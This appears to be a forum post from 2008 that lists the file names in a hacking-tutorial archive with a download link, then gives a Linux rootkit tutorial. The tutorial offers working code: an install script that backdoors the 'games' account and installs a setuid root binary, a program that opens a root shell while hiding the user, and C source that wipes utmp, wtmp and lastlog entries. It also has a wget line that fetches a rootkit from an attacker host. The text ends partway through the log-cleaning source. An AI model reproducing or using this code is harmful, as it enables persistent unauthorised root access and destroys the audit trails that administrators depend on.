FREE Hosting List php, mysql and more.txt
Free Speech in Cyberspace.txt
Free World Dialup.txt
Free X-box Live !.txt
Freebsd Install Guide.txt
Gender Issues in Online Communications.txt
General Keyboard Shortcuts, General Keyboard Shortcuts.txt
Get In Windows 2000 As Administrator.txt
Get the Most Out of Your DVD Recorder.txt
Get The Music You Want To Hear.txt
Get unlimited bandwidth from your host for free.txt
Getting A 1gb Yahoo China Account.txt
Getting Counter-strike Source To Work.txt
getting movies, mp3,games using google.txt
Getting older programs to run on Windows XP.txt
Getting started with Linux for nOObs!.txt
Go to Windows updates anonymously.txt
Google Crack Search.txt
Google secrets.txt
Google Tips & Tricks, (utilizing search engine).txt
Government Computer Security Techniques.txt
Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt
Guide For Getting Free Stuff.txt
Guide to Hacking with sub7.doc
Guide to IIS Exploitation.txt
Guide to Slipstreaming Service Pack 2.txt
HACKDICT.TXT
Hacker Test.txt
Hackers A-Z.TXT
Hackers Who Break into Computer Systems.txt
hacking and phreaking.doc
Hacking Bank Of America's Home Banking System.txt
Hacking Compuserve Infomation Service.txt
Hacking Faq.txt
Hacking for Dummies Volume 2.doc
Hacking For Newbies.doc
Hacking GTE Telemail.txt
hacking in telnet ftp.rtf
Hacking IRC - The Definitive Guide.txt
hacking on Telnet explained.doc
hacking on XP part 1.doc
hacking on XP part 2.doc
hacking on XP part 3.doc
hacking on XP part 4.doc
hacking on XP part 5.doc
hacking password protected site.doc
Hacking Password Protected Website's.doc
hacking passwords.doc
Hacking PC-Pursuit Codes.txt
Hacking Techniques.txt
Hacking TRW.txt
Hacking TYMNET.txt
Hacking Unix System V's.txt
Hacking VoiceMail Systems.txt
Hacking Wal-Mart Computers.txt
Hacking Webpages.txt
Hard drive Gone Bad.txt
Hardware Firewall.txt
Have Notepad In Send To.txt
have satallite tv for almost free IF not free!!!.txt
Hex, How to turn binary or decimal to hex.txt
Hide Drives and Partitions.txt
How 2 Find EVERYTHING uploaded on Rapidshare.txt
How BT phone cards works.txt
How do I overburn a CD with Nero.txt
How do I remove an extra operating system from by.txt
How do I Test My VirusScan Installation.txt
How Do U See Hidden Files, Using DOS...txt
How Download MP3s from Fanscape.com or other Streaming Audio-Video.txt
How Linux boots.txt
How Long Has Your XP System Been Running.txt
How Phone Phreaks are Caught.txt
How the Traditional Media Clasifications Fail to Protect in t.txt
How To Access Your Folders From Your Taskbar.txt
How To Add A Url Address Bar To The Taskbar.txt
How To Add An Option To Print, the Contents of a Folder!.txt
How To Add Your Own Windows Tips.txt
How to Back Up the Registry.txt
How To Backup Ps2 Games.txt
How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt
HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt
How To Block Websties Without Software, block websites.txt
How To Boot Xp Faster (updated).txt
How to build a black box.txt
how to burn quicker in windows xp.txt
How to Bypass BIOS Passwords.txt
How To Bypass Web Filters, tutorial.txt
HOW TO CAPTURE STREAMING MEDIA.txt
How To Change A Cmos Battery.txt
How to change the serial number used in Windows XP, Valid for XP Corporate.txt
How To Change Thumbnail Size And Quality.txt
How to clear Bios info 2.txt
How to clear Bios info.txt
How To Convert File System, fat - fat32 to ntfs.txt
How To Copy A Dvd Which Will Play On A X Box.txt
How to copy songs from your iPod to your PC.txt
How to crash AOL.txt
How To Customise Your start Button.txt
How To Delete Those Persistent Nasty Files.txt
How to dial out of a UNIX System.txt
How To Directly Go To Inbox, Write Msg, w Hotmail, no need for hotmail today - http users.txt
How To Disable Picture And Fax Viewer.txt
How to do a high Quality DivX rip.txt
How To Download Bittorrent Files.txt
How To Download Directly From Crackdb.com.txt
How To Download Movies, From IRC.txt
How to Download-Upload Files from email.txt
how to edit right click menu.rtf
how to execute chm files in linux.txt
How to Extend the life of the yousendit download links.txt
How to find a remote IP.txt
How To Find Ftp's The Easy Way'.txt
How to find MP3's real quickly.txt
How to find Security Holes.txt
How To Find Serial Numbers On Google.txt
How to fix corrupted files in XP.txt
How to fix Windows Installer problem.txt
How To Get A Free I-pod Or Flat Screen Tv, check it out.txt
How to get a Shell in 24 hours.txt
HOW TO GET ANY WINDOWS PASSWORD.txt
How to Get someones ISP password, Get free internet.txt
How To Get Top Ranking, Search Engines.txt
How to Hack UNIX System V.txt
How To Hack Windows Xp Admin Passwords.txt
How to hack-change your Windows XP Boot Screen.txt
how To Hide Yourself From Network Users!, And give access to only specific users!.txt
How To Increase Download Speeds By 100-200 Kbsec.txt
How to Install and run Windows CE on your USB Stick.txt
How to learn to hack in easy steps.doc
How to login to a C.B.I. System.txt
How To Make 5cds, 10cds Or 2dvds From Official Dow, These are same as Mandrake PowerPack+.txt
How to make a Free Phone Call.txt
How To Make A Kvcd.txt
how to make a new web site.txt
How To Make A Transparent Background, .fla .swf.txt
how to make a VCD from a DivX.txt
How To Make An Animted Logo.txt
How To Make Free Phone Calls.txt
How to make key generators.txt
How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt
How To Make XP Go Faster.txt
How To make your own Radio Station 2.txt
How To Make Your Own Radio Station.txt
How To Make Your Own Radiostation.txt
HOW TO MANUAL - THE END OF DELETERS.txt
How to modify exe files.txt
How To Move Xp Harddrive To New Motherboard.txt
How To optimize DSL-CABLE connection speed.txt
How To Play Movies (divx Etc) With Subs.txt
How to Put an End to Unwanted or Harassing Phone Calls.HAR
How to recover MOST of scratched CD data discs.txt
How to Remove DRM Protection for Video Files.txt
How To Remove Ms Java Vm And Install Sun Java.txt
How To Remove Signin Details Of Msn Passport.txt
How To Remove The Default Admin$ Shares.txt
How to remove the Links folder in IE Favorites.txt
How to Remove WinXP Splash and See Operations.txt
How To Rename Extensions With Ease, with a Renamer.bat file!.txt
How to Rename File Extensions.txt
How To Rename Multiple Files In Winxp.txt
How To Restrict Login Hours Allowed.txt
How to safeguard your files when computer crashes.txt
How to save Windows xp updates.txt
how to search google for RAPIDSHARE links.txt
How To See Hidden Files, Using Dos.txt
How to send ICQ Bombs.txt
How To Set search For All Files In Winxp.txt
How to set up a http server running from you computer.txt
How To Set Up A Proxy In Flashget, As Requested.txt
How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt
How To Set Up Direct Connect.txt
HOW TO SET UP FTP SERVER.txt
How To Set Up Proxies In Your Browser.txt
How To Set Zone Alarm Settings!, Fix for ZA ports.txt
How To Setup Your Own Dns (Domain Name Server).txt
How To Speed Up A Slow Computer.txt
How To Speed Up Http Requests On Internet Explorer, as above.txt
How To Stop Spam.txt
How to swear in all languages.txt
How To Unload Cached Dll Files To Free Memory.txt
How to Use and How to Chain Multiple Proxies!.txt
How To Use File Compression In Windows Xp.txt
How To Use Google To Download Mp3's, and applications.....txt
How To Use Newsgroups.txt
How to use the Web to look up information on hacking.doc
How To Use You Gmail With Msn Messenger.txt
How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt
HOWTO Change Windows XP Home to Windows XP Pro.txt
Important Faqs For Sp2.txt
Improve Doom 3's Performances!!, simple but efficient trick for every1.txt
Improve your dialup modem preformance.txt
Increase XP Folder Settings.txt
Information of Hacking AngelFire Websites.txt
Insert Your Serial For Office 2k, auto install office.txt
Install A New Hard-disk.txt
Install Xp From Dos.txt
Installing Apache on Windows.txt
Installing Gentoo Linux, Amazing step by step tutoria.txt
Installing IIS On Windows Xp Pro.txt
Installing Slackware Linux.txt
Instructions For Removal Of Advertising In Msn Messenger.txt
Introduction to Denail of Service.txt
Ip Address Structure, Expilinatin OF IP Address {A short way}.txt
IP addressing, and gaining IP's.txt
IP Addressing.txt
IP how to.rtf
Irc How To Downlaod From, How to downlaod from IRC.txt
Irc Servers On nix, For people who want to start own IRC net.txt
ISSN Numbers- An Introduction.txt
Junk Mail- How Did They All Get My Address.txt
Keep Files Private.txt
Keep Folders Hidden.txt
Keyboard Shortcuts Result in Excel 2000 - Movement.txt
Keyboard Shortcuts, Mcft Word.txt
Keyboard Shortcuts, must read.txt
Kill Mcft Instant Messenger.txt
Lamination Tips, Its a Fast TUT......txt
Leet Way To Get Your Ip In Windows Xp.txt
LENROS~1.TXT
LENROS~2.TXT
Linking Your Xbox To Your Computer.txt
Linux Howto's.txt
List Of Sites Not To Go To.txt
Little help for anonymous mailer.txt
Lots Of Windows Xp Tips, Take A Look !.txt
Lyrics With Google.txt
Make A Autorun File For Ur Cd.txt
Make A Batch File To Clean UR PC!!, All In One!!.txt
Make A Roughly 16 Hour Video Dvd.txt
Make Acrobat Reader 6 load faster.txt
Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt
Make Mp3 Files Smaller Without Losing Quality.txt
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt
Make Your Pc Faster, Guaranteed.txt
MakeXPgoFaster.txt
making a .cue file, in notepad.txt
Making A .txt Executable Server.txt
Making Bootable Floppy Disk to Boot into Windows.txt
Making Cd Version Of Doom3 Into Dvd Version.txt
Making Web Page Fonts Consistent and Uniform.txt
Manage Saved Ie Passwords.txt
Mastering The Windows XP Registry.txt
Maximize Dial-up Modem Settings.txt
MEMETICS.TXT
Mcft's Really Hidden Files, Reveled Hidden files.txt
MINDVOX.TXT
mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt
mIRCcommands.txt
Misc Linux Tips & Tricks.txt
Missing Administrator Account.txt
Mobile Secret Codes.txt
Modify .exe Files And Crack A Program.txt
More Xp Tips and tricks make your computer more faster.txt
MORRIS~1.TXT
Moving and Removing the Start Button.txt
Msn Messenger & Gmail.txt
My Flash Bookmarks, long list of tutorials.txt
Myth about WPA ( How it is done ), Windows Product Activation Technique.txt
NEIDOR~1.TXT
Nero How To Verify The Validity Of The Sn U Use.txt
NetBios explained.doc
New Pc Or New Motherboard.txt
New Way To Relive Some Zinio File.txt
news groups the how to do.txt
NFS Tracing.txt
Nice list of windows shortcuts.txt
Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt
No Text Icons.txt
Ntfs Cluster Size, better harddrive performance.txt
NY_2'S Guide to Obtaining An IP Address. .doc
Official Unattended Xp Cd Guide Xp Sp2 @ Msfn.org.txt
Open Windows Explorer To A Different Default Direc.txt
Optimize Broadband & Dsl Connections.txt
Optimize Emule Connection.txt
Organizational Analysis in Computer Science.txt
Outpost Rules, Outpost rules for system & app.txt
Outsmarting System File Protection.txt
Overclocking_Tutorial.txt
Packet Attacks - Version 1.1, { Packet_Attack_Exlained}.txt
Part 0 Dc++.txt
Part 1 Bittorrents.txt
Part 2 Irc (mirc).txt
Part 3 Ftp.txt
Partitioning Your Harddisk With Fdisk.txt
Pc File Extention Listing.txt
Pc Maintenance Guide.txt
Peer2mail Tutorial.txt
Performance Increase Through My Computer.txt
PGP Startup Guide.htm
Phone Systems Tutorial by The Jolly Roger.txt
Phreakers Handbook.txt
Play Games On PS2 Without ModChip.txt
Play On A Bnet Emulator, and f off cd key check =).txt
Port Numbers.txt
Presumed Guilty.txt
Problem With Internet Navigation, Clean Host File.txt
Proxy how to.rtf
Quick Fix For Spyware, Try This Before Doing Surgery on Your OS.txt
Quick Msc.txt
Quick Phone Modifications.txt
Quick Shutdown for XP, How to create a shutdown shortcut..txt
Quickly Start The Shared Folder Wizard.txt
Raising Hell with Unix.txt
Rapidshare hack!!!!! Free premium acount for all.txt
Rapidshare Hacked, unlimited upload, no countdown.txt
Rapidshare Timelimit.txt
Read This! Av Compare!.txt
Recover A Corrupted System File.txt
Recover a Quick erased CD RW.txt
Reformat&Reinstall.txt
Regedit.exe & Regedt32.exe, Whats the difference.txt
Registry Disassembled a basic tutorial.txt
Reinstall Internet Explorer 6.txt
Release Codes, Read, and Learn....txt
Remarks of the President and Vice President to Silicon Valley.txt
Remote Desktop Through Company Firewall.txt
Remote Shutdown.txt
Remove Linux From Your Pc Safely, ...and restoring your MBR.txt
Remove Msn Messenger From Xp, several ways...txt
Removing Banners From Free Webhosts.txt
Removing Norton Anti-virus 2004, How to remove the Registry Enteries.txt
Rename 'recycle Bin' To Whatever You Want.txt
Reregister All .dll Files Within Registry.txt
Reset your lost Bios Password.txt
Restore JPG,JPEG,JPE Default File associations, Win XP Tweak.txt
REVERSE CODING.txt
RIGGSB~1.TXT
RIGGS_~1.TXT
RIGHTS~1.TXT
RIVERA.TXT
Routing Basics.pdf
Run Aol Without Using Aol Browser & Save Resources, connect permanently and use any browser.txt
Running A Board forum From Your Own Pc.txt
Running Vanishing Console Programs With A Click!, Ever had a console program that vanis....txt
Safely Editing the Registry....txt
Save Your Desktop Icon Settings.txt
Saving and loading Photoshop actions.txt
Scheduled Tasks - Defrag, how to set up scheduled defrags.txt
ScreenLock Professional v2.0.41.txt
SEARCH eBOOK in FTP SEARCH ENGINE.txt
Search For Ebook Server With Google.com.txt
Search like a real warez d00dz, for warez of course!.txt
Searching For Something To Download, This may help.txt
Secret Backdoor To Many Websites.txt
Secrets Of Lock Picking.txt
Securing WinXP Pro (with what win-xp has to offer.txt
Securing your WINDOWS XP computer.txt
Security holes.txt
Seisure Warrent Documents for Ripco BBS.txt
Set Google as your Default Search in IE.txt
Set Win Explorer to open the folder you want!, Little trick.txt
sick of inserting winxp cd every time your pc asks, Change Default Location of i386 Folder.txt
sidebar fix.txt
Simple Tweaks For Peak Pc Graphics Performance.txt
Single Click Shutdown.txt
Single-click To Open An Item..., IF the Folder Options is grayed out.txt
Site Security Handbook.txt
SJ-DEC~1.TXT
SJ-RESP.TXT
Slow Loggon Time, one fix for problem.txt
Slow Opening Of File Dialogs.txt
SMTP-Simple Mail Transfer Protocol.txt
Some Cool Site For Tutorials.txt
Some Google Tricks, again.txt
Some More Tips To Improve Your Winxp.txt
Sp2 For Xp Slipstream, Integrate SP2 into your XP CD.txt
Sp2 Tweaks.txt
Speed Up Internet.txt
Speed up menu display.txt
Speed up Mozilla FireFox.txt
Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidth.txt
Speeding up menus in XP.txt
Speeding up your internet connection under Linux and Windows.html
Spoofing emails, via telenet.txt
Standard ASCII Character Set.txt
Steps to Clean Install XP.txt
Stop A Restart Process In 3steps.txt
Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt
Summary of FBI Computer Systems.txt
SUNDEVIL.TXT
SUPREM~1.TXT
System Changes To Foil Hackers And Browser Hijacke.txt
System File Checker For Windows Xp.txt
TCP packet fragment attacks against firewalls and filters.txt
Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt
Telenet-The Secret Exposed.txt
telnet trick port 25.doc
Testing Wattage Consumption Of Your Computer, Measuring your computer's wattage.txt
The ABC's of Payphones part 1.txt
The ABC's of Payphones part 2.txt
The ABC's of Payphones part 3.txt
The ABC's of Payphones part 4.txt
The Antivirus Defense-in-Depth Guide.txt
The Basics of Hacking- Introduction.txt
The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt
ThE Beige BoX .txt
The Constitution in Cyberspace.txt
The Cracking Manual.txt
The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt
The Electronic Communication Privacy Act of 1986 - A Laymans .txt
The Greatest Hacker of all time.ASC
The Hacker's League.txt
The History of British Phreaking.htm
The Inner Circle Book's Hacking Techniques.txt
The Lamahs-Guide to Pirating Software on the Internet.txt
The M.M.C. Guide to Hacking, Phreaking, Carding.txt
The Modern Phreakers Guide To Beige Boxing.txt
The Modern Phreakers Guide To Payphones.txt
The Moterola Bible.txt
The Myth of the 2600Hz Detector .txt
The National Information Infrastructure-Agenda for Action.txt
The Newbies Handbook- ' How to beging in the World of Hacking.txt
The Newbies-User's Guide to Hacking.txt
The Official Phreaker's Manual.txt
The Phreakers Handbook-1.txt
The Port Guide, Port number and info.txt
The Pre-History of Cyberspace.txt
The Price of Copyright Violation.txt
The REAL way to hack RemoteAccess.txt
The Secret Service, UUCP,and The Legion of Doom.txt
The Telephone Works.txt
The Ultimate Guide To Installing Windows Xp Sp2.txt
The Ultimate Phreaking Guide .txt
the UNIX operating system (Berkley 4.2).txt
Theft of Computer Software-A National Security Threat.txt
Thoughts on the National Research and Education Network.txt
Three Ways Of Bypass Starforce Cd Protection.txt
Tip for shutdown windows - virus.txt
Tips And Tricks, Windows XP.txt
Tips on Starting Your Own BBS.1
Tired Of Reinstalling Windows.txt
To Get And Show The Ip Via Javascript.txt
Top 5 Myths About Safe Surfing, PC Magazine.txt
Transferring Data.txt
Translating Binary To Text.txt
Translating Binary to Text2.txt
Trojan Ports.txt
Turn MSN Messenger Display Pix into User Pix on XP.txt
Turn Off Unneeded Services, speed up pc.txt
Tutorial Get the serial number you need.txt
Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt
Tutorials - blacksun.box.sk
Ultimate Google Way.txt
ULTIMATE GUIDE TO BYPASS BIOS PASSWORDS!.txt
Understanding the Telephone System.txt
undocumented DOS commands.txt
Uninstall Windows Xp And Return To My Old Windows.txt
Uninstalling Norton 2004 Products.txt
UNIX Computer Security Checklist.0
UNIX Use and Security - By the Prophet.txt
UNIX Use and Security From The Ground Up.htm
UNIX- A Hacking Tutorial.SIR
Unlimited Rapidshare Downloads.txt
Untold Window Tips.txt
Untold Windows Secrets.txt
Untold Windows Tips.txt
Unused space on hard drives recovered.txt
Use Hotkeys To Switch Programs.txt
Useful Download Guide, Fix Down, 0daycn Ttdown, Links.txt
User's Guide To Avoiding Virus Infections, Keeping an eye out for viruses.txt
Using Google As A Calculator, A Tutorial.txt
Using Google for searching ebooks.txt
Using Rapid Share, How to use them and skip the BS.txt
Video Avatars.txt
Viewing Leftover Driver Entries.txt
Virtual Memory Information.txt
Virtual Memory Optimization Guide Rev. 4.0 - Final.txt
Viruii FAQ.txt
Virus-Trojan FAQ.txt
Want To Download Torrent File By Using Google.txt
Warez Definations.txt
WAREZ DEFINITION.txt
Way To Download From Brturbo, FireFox.txt
We Don't Need No Education, Online classes made easy.txt
Welcome to The king's meaning's of how to kick some-one's ASS!.txt
What Files are Legal for Distribution on a BBS.txt
What is the Registry.txt
What Should I Do With Image Files.txt
What To Look For In A Code Hacking Program.htm
What To Look For In A Code Hacking Program.txt
What You Should Know About Computer Viruses.DNA
What You Wanted To Know About Movie Jargon, But Were Afraid To Ask.txt
When Good Discs Go Bad.txt
Where Is Winipcfg In Winxp.txt
Who's Seeding The Net With Spyware.txt
Why wait 35 Seconds at eZshare.txt
Win 2000 Dr. Watsson.txt
Windows 2000 Tips & Tricks.txt
Windows 2003 System Restore, How to activate system restore in W2K3.txt
Windows Scan Count Down Time.txt
Windows Shortcuts.txt
WINDOWS TRUE HIDDEN FILES.txt
Windows Tweak, Hack Your Start Button.txt
Windows Xp - Speed Up Your Network and Internet Access.txt
WINDOWS XP HIDDEN APPS.txt
Windows XP Registry Tweaks.txt
Windows XP Startup and Performance Tweaks.txt
Windows Xp Tips 'n' Tricks.txt
Windows Xp Tweaks, A work in progress.txt
Windows XP Tweaks.txt
WinRar Tutorial - Compression profiles, passwords and more.txt
Winsock 2 Repair.txt
WinXP 3 Tips.txt
Winxp Application Defrag, faster access for used programs.txt
Winxp Applications Startup Time, Decrease your Applications startup time.txt
WinXP Bootable CD.txt
Winxp System Response, reboot whitout rebooting.txt
Winxp Tips And Tricks, Winsock 2 repair.txt
Xp Auto Install.txt
Xp Folder View Does Not Stay To You're Setting., Grab your registry editor and join in.txt
XP REPAIR INSTALL.txt
XP Tweaking.txt
Yahoo + geocities Posts.txt
Yahoo Chat Commands how to.rtf
Yahoo Messeger, no ad's.txt
You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt
Your Home Page Nevr Being Changed.txt
Your Own Home Server - Introduction.txt
Zen and the Art of Fone Phreaking `97 .txt
[PHP] Navigations.txt
http://rapidshare.com/files/60612690/200_Hacking_Tutorials_skenderbej.rar…
- Added by ::../-\ 5 |-| @ |\| + i |-| @ ( |<3 r 5..:: ~5id3^3ffec+5~ at 10:10pm on July 6, 2008
- Topic: Ninja - the art of being invisible
- this i'm deeply sorry.
This tut is for educational purposes only, and I mean that; if you have questions like
"teach me how to hack" or "how do i hack hotmail" please keep them to yourself.
If you think you've found any mistake in this file please let me know so I can fix it.
2) Introduction
There is no big deal in getting root access on a box. Any script kiddie can do that.
All he/she has to do is to search on packetstormsecurity.nl, neworder.box.sk,
www.securiteam.com, www.securityfocus.com for the newest bugs. Then he/she compiles them
and then the exploit is run against a vulnerable host.
Of course a smart admin modifies the source of a certain daemon so that kernel response to
fingerprints could be faked, but this is not the subject of my article.
So, let's suppose you got root using... let's say the wu-ftpd 2.6.1 exploit by zen-parse.
It spawns a connect back shell and you can type any command as root. Not for long because
if you're idle a few minutes the connection with server is reset and you will have to do
it all over again.
You have root but you also filled the logs. The first entry in the logs is the exploit output.
Then, if bash is modified to log everything you type, there is another problem :)
So, what is a rootkit anyway? It is a program or a bunch of programs that helps you to
keep access on a rooted box without being logged. Every time you want to connect, the rootkit
grants you access and then clears all the logs for you. But are you invisible? The answer is NO.
After all, they are nothing but some new files and they can be found by a smart admin.
The question is: how soon can they be found? How much time can you keep access?
Forever, if the admin is dumb, not a single day if the admin knows his job.
Well, many lamers have a rootkit. Usually they keep it on a ftp site. After they got root, they
type:
wget http://theirhost.com/rootkit.tgz
gunzip rootkit.tgz
tar -xvf rootkit.tar
Then the rootkit is installed, rarely the logs are cleaned entirely coz so-called "hackers"
have no idea what they are doing, they don't even know programming.
Now the race between hacker and admin begins. This is the funny part.
The most common rootkits leave an open port so the hacker can connect later, usually a
higher port like 31337. Bad move because the commands "ps -aux", "netstat -an" and "top"
make it visible and it is removed along with your access.
Other rootkits are backdooring the cron configuration file, so a port is open every 8 hours, let's say.
A smart move would be to replace /bin/login file with a new one, that allows root access to a
specified username and password. But there are scripts that check file checksums and ... the
admin might suspect something. You can modify the program to have the same checksum as the original
one. Sure, that takes time and you need a good rootkit right away.
Adding a user with UID=0 and GID=0 is a bad idea also but it helps to keep access for a few
days, especially if there are too many registered users.
I won't say a thing about backdooring /etc/inetd.conf, /etc/services, .rhosts, those techniques are
very well known.
In the following I will present my idea of a rootkit.
Before that, lets think logically:
What are the logs we wanna remove our entries from?
Let's say, for our (compromised) linux installation it is:
/var/log/messages
/var/adm/lastlog
/var/adm/utmp
/var/adm/wtmp
tcp.log if linsniffer is running
syslogd log file if the host has remote logging enabled
What are the commands that represent a danger of revealing our rootkit?
ps
top
netstat
w
who
rwho
What's the logic behind building a rootkit?
1) to create a gate so you can get in any time you want
2) to clear the logs every time
3) to hide its processes
3) Building a rootkit
I suppose the introduction part has bored you :) Let's try to build a rootkit. If you understand
the idea, you can build your own rootkit. The following are available only if there is a way to
connect to the machine, telnetd or sshd enabled.
Advantages:
- invisible to w, who, rwho and other commands used to monitor the system status
- no port is left open
- no trace is left in the logs
- very easy to use
Disadvantages:
- well, the presence of a rootkit is a disadvantage :)
- changes are visible in /etc/shadow..to a closer look though :)
Files:
install.sh
kupdate.c
cl.c
Principles of working:
Password for user games is changed. I changed the password for an existing user so the
change won't be visible in /etc/passwd. Enough that it is visible in /etc/shadow :)
When the hacker connects to the system using user:games and the desired password, he will get
a $ as a prompt, meaning he has a local shell. Once he types kupdate he will become invisible
to root and of course he will have UID=0 and GID=0. Almost all logs are cleared.
install.sh
================================== cut here ==================================
#!/bin/sh
comp=`which gcc | grep no`
if [ ! -z "$comp" ]; then
echo "gcc not found!"
exit
fi
passwd -d games
echo ""
echo "You will be prompted for a password for user games!"
echo ""
passwd games
echo ""
gcc kupdate.c -o kupdate
mv kupdate /bin
chmod +s /bin/kupdate
# lame, better chown it and let it be executed only by games
# it's just an example, be creative :)
rm -f kupdate.c
gcc clean.c -o cl
mv cl /bin
rm -f cl.c
cl u games
cl w games
cl l games localhost
echo "Done!"
================================== cut here ==================================
When the hacker connects to his rooted box, all he has to do is type "kupdate" and he will
become invisible with root access. I named it kupdate because in "ps -A" output [kupdate]
is shown, but it can create confusion for an inexperienced admin, ninja style, right :)
[kupdate] is not really a physical file, but a newbie admin doesn't know that and for sure he
won't delete the file /bin/kupdate if he finds it by any chance in /bin.
Here it is:
================================== cut here ==================================
main()
{
setuid(0);
setgid(0);
system("cl u games");
system("cl w games"); /* logs are being cleared */
system("cl l games localhost");
system("/bin/bash");
}
================================== cut here ==================================
cl.c will clear utmp, wtmp and lastlog.
Here it is:
================================== cut here ==================================
#include
#include
#include
#ifndef NO_ACCT
#include
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef HAVE_LASTLOG_H
#include
#endif
#ifdef HAVE_UTMPX
#include
#endif
#ifndef UTMP_FILE
#ifdef _PATH_UTMP
#define UTMP_FILE _PATH_UTMP
#else
#define UTMP_FILE "/var/adm/utmp"
#endif
#endif
#ifndef WTMP_FILE
#ifdef _PATH_WTMP
define WTMP_FILE _PATH_WTMP
#else
#define WTMP_FILE "/var/adm/wtmp"
#endif
#endif
#ifndef LASTLOG_FILE
#ifdef _PATH_LASTLOG
#define LASTLOG_FILE _PATH_LASTLOG
#else
#define LASTLOG_FILE "/var/adm/lastlog"
#endif
#endif
#ifndef ACCT_FILE
#define ACCT_FILE "/var/adm/pacct"
#endif
#ifdef HAVE_UTMPX
#ifndef UTMPX_FILE
#define UTMPX_FILE "/var/adm/utmpx"
#endif
#ifndef WTMPX_FILE
#define WTMPX_FILE "/var/adm/wtmpx"
#endif
#endif /* HAVE_UTMPX */
#define BUFFSIZE 8192
/*
* This function will copy the src file to the dst file.
*/
void
copy_file(char *src, char *dst)
{
int fd1, fd2;
int n;
char buf[BUFFSIZE];
if ( (fd1 = open(src, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s during copy.\n", src);
return;
}
if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) {
fprintf(stderr, "ERROR: Creating %s during copy.\n", dst);
return;
}
while ( (n = read(fd1, buf, BUFFSIZE)) > 0)
if (write(fd2, buf, n) != n) {
fprintf(stderr, "ERROR: Write error during copy.\n");
return;
}
if (n < 0) {
fprintf(stderr, "ERROR: Read error during copy.\n");
return;
}
close(fd1);
close(fd2);
}
/*
* UTMP editing.
*/
void
wipe_utmp(char *who, char *line)
{
int fd1;
struct utmp ut;
printf("Patching %s .... ", UTMP_FILE);
fflush(stdout);
/*
* Open the utmp file.
*/
if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE);
return;
}
/*
* Copy utmp file excluding relevent entries.
*/
while ( read(fd1, &ut, sizeof(ut)) > 0)
if ( !strncmp(ut.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (int) -sizeof(ut), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
}
close(fd1);
printf("Done.\n");
}
/*
* UTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_utmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;
printf("Patching %s .... ", UTMPX_FILE);
fflush(stdout);
/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE);
return;
}
while ( (read(fd1, &utx, sizeof(utx)) ) > 0)
if ( !strncmp(utx.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (int) -sizeof(utx), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
}
close(fd1);
printf("Done.\n");
}
#endif
/*
* WTMP editing.
*/
void
wipe_wtmp(char *who, char *line)
{
int fd1;
struct utmp ut;
printf("Patching %s .... ", WTMP_FILE);
fflush(stdout);
/*
* Open the wtmp file and temporary file.
*/
if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE);
return;
}
/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(ut)), SEEK_END);
while ( (read (fd1, &ut, sizeof(ut))) > 0) {
if (!strncmp(ut.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
break;
}
lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR);
}
close(fd1);
printf("Done.\n");
}
/*
* WTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_wtmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;
printf("Patching %s .... ", WTMPX_FILE);
fflush(stdout);
/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE);
return;
}
/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(utx)), SEEK_END);
while ( (read (fd1, &utx, sizeof(utx))) > 0) {
if (!strncmp(utx.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
break;
}
lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR);
}
close(fd1);
printf("Done.\n");
}
#endif
/*
* LASTLOG editing.
*/
void
wipe_lastlog(char *who, char *line, char *timestr, char *host)
{
int fd1;
struct lastlog ll;
struct passwd *pwd;
struct tm *tm;
char str[4];
printf("Patching %s .... ", LASTLOG_FILE);
fflush(stdout);
tm = (struct tm *) malloc( sizeof(struct tm) );
/*
* Open the lastlog file.
*/
